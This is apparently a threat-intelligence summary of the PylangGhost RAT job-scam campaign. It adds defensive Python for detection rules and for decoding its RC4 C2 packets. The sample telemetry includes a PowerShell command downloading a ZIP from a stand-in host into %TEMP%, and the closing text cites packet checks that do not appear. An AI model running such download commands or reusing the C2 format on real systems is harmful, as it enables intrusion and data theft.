2025-06-26

North Korean Group Deploys Python-Based PylangGhost RAT in Job Scam Campaigns

Level: Tactical | Source: Cisco Talos
Marketing
Professional Services
Technology

Threat activity uncovered in May 2025 involved a Python-based remote access trojan (RAT) that Cisco Talos tracks as "PylangGhost." Talos attributes the campaign to the North Korean-aligned threat actor Famous Chollima, also known as Wagemole. The actor is financially motivated and relies on tactics such as fake job recruitment to harvest sensitive personal information or to place its own operatives inside victim organizations. Talos ties this activity to the ongoing "Contagious Interview" campaign, in which fake employers lure jobseekers under false pretenses. The latest wave primarily targets users in India, impersonating well-known companies such as Archblock, Coinbase, and Robinhood and advertising fabricated roles including Business Development Manager and Marketing Strategist. Victims, particularly individuals in software engineering, design, and marketing roles, are asked to complete fake assessments presented as part of employment screening.

The infection chain begins once a target agrees to take a skills assessment. After answering job-specific questions, the victim is asked to enable camera access and then to run system commands that supposedly install a video driver. These paste-and-run commands follow the ClickFix pattern and are tailored to the operating system. On Windows, PowerShell's "Invoke-WebRequest" or "curl.exe" downloads a ZIP archive into the "%TEMP%" directory; the archive contains a Visual Basic Script that is launched with "wscript.exe" and in turn starts a renamed Python interpreter to execute the malicious script "nvidia.py." On macOS, a Bash one-liner fetches a shell script with "curl," while the Linux variant produced errors at this stage during Talos' testing. Once running, "nvidia.py" unpacks the Python libraries it needs, gains persistence by adding a Windows registry entry, and begins communicating with the actor's command-and-control (C2) server.
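The Windows stages above map cleanly onto endpoint telemetry. The following is an added example, not Talos code and not an artifact from the campaign: it turns each stage into a detection rule and links them through process ancestry, run over constructed Sysmon-style events. The event schema, process IDs, file names (driver.zip, update.vbs, nvidia.exe) and paths are assumptions made for illustration, not indicators from the report.

```python
"""Added example: stage-by-stage detection of the paste-and-run chain described above,
run over constructed Sysmon-style events. Not Talos code; schema and names are assumed."""
import re

# %TEMP% as it appears in PowerShell ($env:TEMP), batch (%TEMP%) or expanded on disk.
TEMP_RE = re.compile(r"%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\", re.I)

# Constructed telemetry (hypothetical pids, paths and file names, not campaign IOCs).
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "pid": 100, "ppid": 50, "original_name": "PowerShell.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Invoke-WebRequest -Uri http://example.invalid/driver.zip -OutFile $env:TEMP\driver.zip"'},
    {"id": 2, "type": "process", "pid": 101, "ppid": 100, "original_name": "wscript.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\victim\AppData\Local\Temp\driver\update.vbs"},
    {"id": 3, "type": "process", "pid": 102, "ppid": 101, "original_name": "python.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\driver\nvidia.exe",
     "cmdline": r"nvidia.exe nvidia.py"},
    {"id": 4, "type": "registry", "pid": 102,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\nvidia",
     "data": r"C:\Users\victim\AppData\Local\Temp\driver\nvidia.exe nvidia.py"},
    # Benign control: wscript running a vendor installer script outside %TEMP%.
    {"id": 5, "type": "process", "pid": 200, "ppid": 50, "original_name": "wscript.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Program Files\Vendor\install.vbs"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_download_to_temp(ev: dict) -> bool:
    """Stage 1: PowerShell/cmd fetching a ZIP into %TEMP% via Invoke-WebRequest or curl."""
    if ev["type"] != "process":
        return False
    cmd = ev["cmdline"]
    fetch = re.search(r"Invoke-WebRequest|\biwr\b|\bcurl(\.exe)?\b", cmd, re.I)
    return bool(fetch and re.search(r"\.zip\b", cmd, re.I) and TEMP_RE.search(cmd))


def rule_wscript_temp_vbs(ev: dict) -> bool:
    """Stage 2: wscript.exe executing a .vbs that lives under %TEMP%."""
    return (ev["type"] == "process" and basename(ev["image"]) == "wscript.exe"
            and re.search(r"\.vbs\b", ev["cmdline"], re.I) is not None
            and TEMP_RE.search(ev["cmdline"]) is not None)


def rule_renamed_python(ev: dict) -> bool:
    """Stage 3: a binary whose PE OriginalFileName is python.exe but whose on-disk name is not.
    (Sysmon exposes OriginalFileName; the assumed value 'python.exe' is CPython's.)"""
    return (ev["type"] == "process" and ev.get("original_name", "").lower() == "python.exe"
            and not basename(ev["image"]).startswith("python"))


def rule_run_key_to_temp(ev: dict) -> bool:
    """Stage 4: a Run-key value whose command points into %TEMP%."""
    return (ev["type"] == "registry"
            and re.search(r"\\CurrentVersion\\Run\\", ev["key"], re.I) is not None
            and TEMP_RE.search(ev["data"]) is not None)


RULES = {
    "download_to_temp": rule_download_to_temp,
    "wscript_temp_vbs": rule_wscript_temp_vbs,
    "renamed_python": rule_renamed_python,
    "run_key_to_temp": rule_run_key_to_temp,
}


def evaluate(events: list) -> dict:
    """Per-event hits: {event id: [rule names]} for every event matching at least one rule."""
    hits = {}
    for ev in events:
        matched = [name for name, fn in RULES.items() if fn(ev)]
        if matched:
            hits[ev["id"]] = matched
    return hits


def correlate_chain(events: list) -> list:
    """Anchor on the renamed interpreter and walk parent -> grandparent to confirm the
    download and wscript stages, then attach the Run-key write made by the same pid."""
    by_pid = {ev["pid"]: ev for ev in events if ev["type"] == "process"}
    chains = []
    for ev in events:
        if not rule_renamed_python(ev):
            continue
        stages = ["renamed_python"]
        parent = by_pid.get(ev["ppid"])
        if parent and rule_wscript_temp_vbs(parent):
            stages.insert(0, "wscript_temp_vbs")
            grand = by_pid.get(parent["ppid"])
            if grand and rule_download_to_temp(grand):
                stages.insert(0, "download_to_temp")
        if any(e["type"] == "registry" and e["pid"] == ev["pid"] and rule_run_key_to_temp(e)
               for e in events):
            stages.append("run_key_to_temp")
        chains.append({"pid": ev["pid"], "stages": stages})
    return chains


if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))
    print(correlate_chain(SAMPLE_EVENTS))
```

Each rule on its own will fire on some legitimate activity (developers run renamed interpreters, installers drop VBS files in %TEMP%); the value is in the ancestry chain, which is why the correlation anchors on the interpreter and only then asks whether its parent was wscript.exe and its grandparent a download into %TEMP%. The benign control event shows the wscript rule staying quiet for a script outside %TEMP%.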

PylangGhost is built from six Python modules that mirror those of the previously documented GolangGhost, covering configuration, system interaction, browser credential theft, data compression, and the C2 protocol. Despite that structural parity, Talos sees no sign that large language models were used to produce the Python variant. "Based on the comments in the code, it is unlikely that the threat actors used a large language model (LLM) to help rewrite the code for Python," writes Cisco Talos researcher Vanja Svajcer. On startup, "nvidia.py" creates a registry key for persistence and generates a GUID that identifies the infected host to the C2. The RAT then loops, pulling commands from the C2 and executing them; supported operations include running OS shell commands, uploading and downloading files, and harvesting credentials. The Python version uses the same command codes as the Golang variant and can steal data from more than 80 browser extensions, including password managers and cryptocurrency wallets such as MetaMask, Phantom, NordPass, and TronLink.

PylangGhost talks to its C2 servers over plain HTTP, with the message payload encrypted using RC4. Each packet is prefixed with an MD5 checksum and the RC4 key itself, used for verification and decryption respectively. This keeps the protocol lightweight and hides the payload from casual inspection, but it is obfuscation rather than real confidentiality: because the key travels inside the packet, anyone who captures the traffic can decrypt it, and the MD5 prefix detects corruption, not tampering, since a forger can simply recompute it. For defenders this means a full-packet capture or proxy log of the C2 traffic is directly decodable. The remaining modules divide up the work: "util.py" handles data compression, "command.py" interprets the encoded command messages, and "auto.py" extracts session data and browser artifacts. Talos' comparison of the Python and Golang variants shows near-identical functional design, which suggests the same actor or team maintains both. Given the actor's operational breadth and modular tooling, jobseekers in the targeted roles should treat unsolicited recruiting messages with suspicion and verify job postings from unfamiliar sources through official company channels.
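The packet layout described above (checksum, in-band RC4 key, RC4-encrypted body), worked through as an added example in Python. This is not PylangGhost code: the field order and sizes (a 16-byte MD5 over key plus ciphertext, then a 16-byte key, then the ciphertext) are assumptions, since the page names only the components and not their arrangement. What it demonstrates is that a defender holding a capture can decrypt every message without any prior key, and that the MD5 prefix rejects a corrupted packet but accepts a forged one.

```python
"""Added example: build and decode packets in the assumed PylangGhost-style layout
    md5(key || ciphertext) || key || rc4(key, plaintext)
Not PylangGhost code; layout, key length and sample command text are assumptions."""
import hashlib
import os

DIGEST_LEN = 16  # MD5 digest size
KEY_LEN = 16     # assumed RC4 key length; the page does not state one


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_packet(plaintext: bytes, key: bytes = b"") -> bytes:
    """What the implant or C2 would send: checksum, then the key, then the ciphertext."""
    if not key:
        key = os.urandom(KEY_LEN)
    if len(key) != KEY_LEN:
        raise ValueError("key must be %d bytes" % KEY_LEN)
    body = rc4(key, plaintext)
    return hashlib.md5(key + body).digest() + key + body


def parse_packet(blob: bytes) -> bytes:
    """What the receiver (or a defender with a capture) does: verify MD5, pull the
    in-band key, decrypt. No secret is needed beyond the packet itself."""
    if len(blob) < DIGEST_LEN + KEY_LEN:
        raise ValueError("packet too short")
    digest = blob[:DIGEST_LEN]
    key = blob[DIGEST_LEN:DIGEST_LEN + KEY_LEN]
    body = blob[DIGEST_LEN + KEY_LEN:]
    if hashlib.md5(key + body).digest() != digest:
        raise ValueError("MD5 checksum mismatch")
    return rc4(key, body)


def inspect_capture(blob: bytes) -> dict:
    """Analyst view of a captured packet: the key it carried and the decrypted content."""
    plaintext = parse_packet(blob)
    return {"key": blob[DIGEST_LEN:DIGEST_LEN + KEY_LEN].hex(), "plaintext": plaintext}


if __name__ == "__main__":
    # Constructed sample command; the real command format is not described on the page.
    msg = b'{"cmd": "shell", "args": "whoami"}'
    pkt = build_packet(msg)
    print(inspect_capture(pkt))
```

The same `parse_packet` serves the implant, the C2 and the analyst, which is exactly the weakness: there is no key agreement, so a capture is enough. The forged-packet case in the checks below (new plaintext, the victim's own key, a recomputed MD5) passes verification, which is why the checksum should be read as a framing aid and not as message authentication.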
